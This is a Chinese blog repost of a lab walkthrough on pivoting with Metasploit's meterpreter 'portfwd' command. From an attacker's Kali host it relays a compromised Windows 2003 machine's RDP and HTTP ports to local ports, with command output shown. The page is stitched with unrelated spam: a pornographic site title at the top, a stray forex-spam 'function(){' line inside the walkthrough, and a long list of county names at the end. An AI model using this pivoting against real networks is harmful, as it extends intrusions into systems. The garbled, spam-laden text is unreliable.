亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

基于Portfwd端口轉發

發布時間:2020-08-07 19:20:14 來源:ITPUB博客 閱讀:228 作者:專注的阿熊 欄目:數據庫

Portfwd是一款強大的端口轉發工具,支持TCP,UDP,支持IPV4--IPV6的轉換轉發。 并且內置于meterpreter。 其中exe單版本源碼如下:

https://github.com/rssnsj/portfwd

復現過程

攻擊機: 192.168.1.5                     Debian(Kali)

靶   機: 192.168.1.4                  Windows7

192.168.1.119        Windows 2003


Sessions -l查看所有msf的連接,看到一條連接到windows 03通信,是從192.168.1.1:455303到192.168.1.119:53

基于Portfwd端口轉發

session -l  查看會話

基于Portfwd端口轉發

靶機IP為:192.168.1.119---windows 2003---x64

function(){   //外匯跟單www.gendan5.com

需要轉發端口為:80,3389

選擇連接中的1號,就一條所以就只能選這個了

基于Portfwd端口轉發

續上圖

基于Portfwd端口轉發

基于Portfwd端口轉發

  Portfwd -h查看用法

基于Portfwd端口轉發

基于Portfwd端口轉發

 攻擊執行

1   meterpreter   >   portfwd   add   l   33389   r   192.168.1.119   p 3389

2   [ * ]   Local   TCP   relay created: : 33389   <‐> 192.168.1.119 : 3389

3   meterpreter   >   portfwd   add   l   30080   r   192.168.1.119   p 80

4   [ * ]   Local   TCP   relay created: : 30080   <‐> 192.168.1.119 : 80

5   meterpreter >   portfwd

Index Local   RemoteDirection

1 0.0.0.0 : 33389 192.168.1.119 : 3389   Forward

2 0.0.0.0 : 30080 192.168.1.119 : 80   Forward

2   total active port forwards .

成功

基于Portfwd端口轉發


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

汉阴县| 沈阳市| 定襄县| 额济纳旗| 灵石县| 盐山县| 荆门市| 陵川县| 长泰县| 阿图什市| 高唐县| 内江市| 东丰县| 即墨市| 安仁县| 广安市| 榕江县| 象州县| 聊城市| 南京市| 海淀区| 玉树县| 南江县| 加查县| 宜宾市| 枣庄市| 都安| 平安县| 洛阳市| 扬中市| 孟村| 东兰县| 新余市| 星座| 临海市| 鹿泉市| 蒙山县| 正宁县| 托克托县| 江达县| 浑源县|